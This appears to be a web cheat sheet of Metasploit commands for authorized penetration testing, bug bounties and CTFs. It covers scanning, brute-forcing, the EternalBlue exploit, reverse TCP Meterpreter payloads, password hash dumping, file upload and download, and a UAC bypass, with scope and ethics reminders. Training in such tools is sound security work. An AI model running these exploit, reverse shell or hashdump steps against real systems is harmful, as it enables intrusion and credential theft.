Metasploit Cheat Sheet for Penetration Testing
Metasploit Cheat Sheet for Ethical Bug Bounty Programs & CTF
Metasploit is one of the most powerful tools for ethical hackers, penetration testers, and security researchers. This cheat sheet provides the essential commands and steps to use Metasploit for security analysis during ethical bug bounty programs or Capture the Flag (CTF) competitions. Whether you are testing an authorized application for vulnerabilities or looking to sharpen your skills in CTFs, Metasploit can assist in a variety of tasks, including reconnaissance, exploitation, post-exploitation, and more.
1. Starting Metasploit
To begin using Metasploit, launch the framework from the command line:
msfconsole # Start the Metasploit console
2. Information Gathering (Reconnaissance)
Search for Modules (e.g., Scanners, Vulnerabilities)
Search for modules related to the target:
search <keyword> # Search for exploit, scanner, or auxiliary modules
Use an Auxiliary Module (e.g., Port Scan)
Use an auxiliary module for port scanning:
use auxiliary/scanner/portscan/tcp # TCP Port scanner
set RHOSTS <target_ip> # Set target IP address
set THREADS <number_of_threads> # Number of threads for faster scanning
run # Execute the scan
Service Version Enumeration
For HTTP version enumeration:
use auxiliary/scanner/http/http_version # Enumerate HTTP versions
set RHOSTS <target_ip> # Set the target IP address
Directory Brute-Forcing (for Web Servers)
Brute-force directories on a web server:
use auxiliary/scanner/http/dir_scanner # Directory brute-force scanner
set RHOSTS <target_ip> # Set the target IP address
set THREADS 10 # Adjust threads for performance
3. Exploitation
Search for Exploits
Search for specific exploits in the database:
search <vulnerability_name> # For example: search ms17_010 for EternalBlue
Use an Exploit Module
For example, to use the MS17-010 EternalBlue exploit:
use exploit/windows/smb/ms17_010_eternalblue # Use the MS17-010 SMB exploit
set RHOSTS <target_ip> # Set the target IP address
set RPORT 445 # Set the target port (445 for SMB)
exploit # Execute the exploit
4. Payloads
Metasploit allows you to use various payloads to gain control over the compromised system.
List Available Payloads
show payloads # List all available payloads
Select a Payload
To use a reverse TCP Meterpreter payload:
set PAYLOAD windows/meterpreter/reverse_tcp # Select reverse TCP Meterpreter payload
Set Payload Options (LHOST and LPORT)
Set the local IP address (LHOST) and port (LPORT) for the reverse connection:
set LHOST <your_ip> # Set your local IP address for reverse connection
set LPORT <your_port> # Set the port number for reverse shell connection
Exploit with Payload
Run the exploit along with the payload:
exploit # Execute the exploit with the selected payload
5. Post-Exploitation (Ethical Usage)
Once the target system is compromised, you can perform post-exploitation activities while adhering to ethical guidelines.
List Active Sessions
To view active sessions:
sessions # List all active sessions
Interact with a Session
To interact with a specific session:
sessions -i <session_id> # Interact with a specific session (e.g., sessions -i 1)
Get System Information
To gather information about the compromised system:
sysinfo # Get system info (OS, architecture, etc.)
id # Check the current user ID
getuid # Show the current user ID (administrator or not)
Privilege Escalation
Check for privilege escalation opportunities. If allowed, you can attempt privilege escalation:
getuid # Check if the current user has admin/root privileges
Dump Password Hashes (if allowed by rules)
If the bug bounty program allows you to dump password hashes:
hashdump # Dump password hashes (Windows-based systems)
Upload a File
You can upload files to the target machine for further exploitation:
upload <local_file> <remote_path> # Upload a file (e.g., upload /path/to/payload.exe C:/Windows)
Download a File
Download a file from the compromised target:
download <remote_file> <local_path> # Download a file from the compromised system
Create Reverse Shell (Post-Exploitation)
For post-exploitation, you may want to set up a reverse shell:
run post/windows/manage/reverse_tcp LHOST=<your_ip> LPORT=<your_port>
6. Privilege Escalation (Local)
Privilege escalation can give you full control over the target system. Use local exploits to escalate privileges.
Search for Privilege Escalation Exploits
search type:exploit local # Search for local privilege escalation exploits
Use Local Exploits
Example of using a local exploit:
use exploit/windows/local/bypassuac # Bypass User Account Control (UAC) on Windows
set SESSION <session_id> # Set the session ID to exploit
exploit # Run the local exploit
7. Useful Auxiliary Modules
Metasploit has several useful auxiliary modules for scanning and enumeration.
HTTP Bruteforce (Common for Login Pages)
To brute-force HTTP login forms:
use auxiliary/scanner/http/httppost # Brute-force HTTP POST login forms
set RHOSTS <target_ip> # Set target IP address
set USER_FILE <usernames_file> # File containing usernames to test
set PASS_FILE <passwords_file> # File containing passwords to test
SMB Version Scanning
To detect SMB version and vulnerabilities:
use auxiliary/scanner/smb/smb_version # Detect SMB version
set RHOSTS <target_ip> # Set the target IP address
Directory Brute-Force (Common for Web Servers)
To brute-force directories on a web server:
use auxiliary/scanner/http/dir_scanner # Brute-force HTTP directories
set RHOSTS <target_ip> # Set target IP
set THREADS 10 # Adjust threads for performance
8. Handling Sessions
Once you have established a session, you can interact with it or manipulate it.
Background a Session
To background an active session and return to msfconsole:
background # Send the current session to the background
Interact with a Backgrounded Session
To return to a specific session:
sessions -i <session_id> # Interact with a specific session
Kill a Session
To terminate a session:
sessions -k <session_id> # Kill the specified session
9. Metasploit Help and Documentation
Metasploit offers built-in documentation for help.
Help Command
help # Display general help in msfconsole
Info on a Module
info <module_name> # Display detailed information on a specific module
Show Available Options for a Module
show options # Display available options for the current module
10. Important Considerations
- Stay within Scope: Always adhere to the rules of engagement. Only test the systems explicitly authorized by the bug bounty program or CTF competition.
- Report Responsibly: When you identify vulnerabilities, report them with detailed steps, proof of concept (PoC), and suggested mitigations.
- Don’t Exploit Beyond the Minimum: Metasploit can automate many tasks, but use it responsibly and ethically. Avoid denial-of-service attacks or data exfiltration unless explicitly allowed.
11. Useful Tips
- Reconnaissance First: Always start with reconnaissance to gather basic information about the target (e.g., open ports, services, subdomains).
- Use Multi-Handler: For reverse shells, use a multi-handler to maintain persistent communication with compromised systems.
- Stay Updated: Ensure your Metasploit Framework is up to date to take advantage of the latest exploits and features.